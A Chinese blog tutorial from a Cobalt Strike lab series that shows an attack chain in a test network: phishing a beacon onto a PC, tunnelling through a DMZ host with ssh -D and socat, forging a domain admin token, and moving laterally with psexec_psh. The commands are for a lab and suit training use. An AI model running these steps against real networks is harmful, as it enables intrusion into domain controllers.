161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](http://pic.ttrar.cn/nice/161%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95.jpg)
我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!!
文章目录
-
- 一、Cobalt Strike域内渗透
-
- 1 实验环境
-
- 1.1 实验拓扑
- 1.2 环境搭建
- 2 实验:搭建SSH隧道内网渗透
- 3 参考链接
一、Cobalt Strike域内渗透
1 实验环境
1.1 实验拓扑
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/907e46188584460b8b30e1bf3cb6d382.png)
1.2 环境搭建
传送门
2 实验:搭建SSH隧道内网渗透
2.1 SSH隧道简介
在内网中几乎所有的linux服务器和网络设备都支持ssh协议。一般情况下,ssh协议是允许通过防火墙和边界设备的,所以经常被攻击者利用。同时ssh协议的传输过程是加密的,所以我们很难区分合法的ssh会话和攻击者利用其他网络建立的隧道。攻击者使用ssh端口隧道突破防火墙的限制后,能够建立一些之前无法建立的TCP连接。
2.2 SSH隧道实验背景
(kali)(team server)外网攻击机:192.168.97.129
(win2008)内网1-域控:10.0.0.2
(Centos7)内网1-DMZ跳板机:10.0.0.5、192.168.97.71(模拟网站外网IP)
(Win10)内网2-PC:10.1.1.2、192.168.97.204(模拟访问外网时候的外部网关)
2.3 实验过程
2.3.1 通过钓鱼链接获取内网2-PC机的http beacon,派生到smb beacon
sleep 0
//注意:靶机Win10需要关闭实时防护,进入交互式shell
//如下图所示:成功通过钓鱼链接获取内网2-PC机的smb beacon
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/83ec053e343d49ae9e6dbab53b1541aa.png)
2.3.2 在Team Server上搭建和双网卡web跳板机的ssh隧道:本地1080对DMZ跳板机22
# ssh -D 1080 DMZ跳板机user@DMZ跳板机外网IP
# ssh -D 1080 root@192.168.97.71
//注意:需要知道web跳板的账号密码:root/123
//解释1:本质上这条命令就是把本地的1080端口当作一个代理服务器,任何通过这个代理服务器的流量都会转发到远程的那台双网卡DMZweb跳板机主机上
//解释2:在本地TeamServer创建动态端口1080进行转发连接到192.168.97.71双网卡机子的22
//解释3:该命令中的 -D 参数会使 SSH 建立一个 socket,并去监听本地的 1080 端口,一旦有数据传向那个端口,就自动把它转移到 SSH 连接上面,随后发往远程主机。
//如下图所示:成功在team server和DMZweb跳板机之间建立了ssh隧道
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/ebca6bfb05294a0d82fa0593d38dc542.png)
2.3.3 在Team Server上开启445端口转发:本地445对本地1080,并且目的地为域控445
# netstat -pantu | grep 445
# systemctl stop smbd
//关闭自己的445端口,防止占用
# socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:<target>:445
# socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:10.0.0.2:445
//解释1:socat 可以理解成 netcat 的加强版。socat 建立 socks 连接默认端口就是 1080 ,由于我们上面设置的就是 1080,因此这里不需变动。如果设置了其他端口,那么这里还需要在命令最后加上 ,socksport= 指定端口才行。
//解释2:一旦有人访问本地Team Server445端口的数据会被转发到本地的1080,然后通过之前配置SSH隧道把1080流量转发到跳板机的22端口;此时又配置了target为10.0.0.2的445,因此跳板机又可以且去找10.0.0.2的445,最后就到了10.0.0.2的445
//如下图所示:成功的把本地445转发到本地1080,并且目标设置为10.0.0.2的445
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/67f23aae630b4bec96d95ac2d32497c9.png)
2.3.4 在内网2-PC机的smb beacon上制作10.0.0.2域控的令牌
shell dir \\\\192.168.97.129\\c$
make_token [DOMAIN\\user] [password]
make_token demo1\\administrator qweQWE123.
//注意:需要知道DC域控管理员的账号密码
//解释:访问192.168.97.129的(也就是team server)的共享服务(也就是445),此时走向:kali teamserver 445—【socks隧道】—>kali teamserver 1080—【ssh隧道】—>dmz跳板机22—【socks隧道】—>域控10.0.2的445
//如下图所示:制作域控令牌后才可以访问10.0.0.2的C盘共享
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/a66e5c967ee24f3cb4a917e554bf968c.png)
2.3.5 在内网2-PC机smb beacon上连接team server的445端口
psexec_psh 192.168.97.129 smb-beacon-1
//解释:访问192.168.97.129的(也就是team server)的共享服务(也就是445),此时走向:kali teamserver 445—【socks隧道】—>kali teamserver 1080—【ssh隧道】—>dmz跳板机22—【socks隧道】—>域控10.0.2的445
//如下图所示:若连接不上,恢复原始令牌,重新创建域控令牌再去连接
![161.网络安全渗透测试—[Cobalt strike系列]—[SSH隧道]](https://img-blog.csdnimg.cn/4eb4f395078f4cb5886d394035f604ab.png)
3 参考链接
参考链接:https://blog.csdn.net/f_carey/article/details/122692746
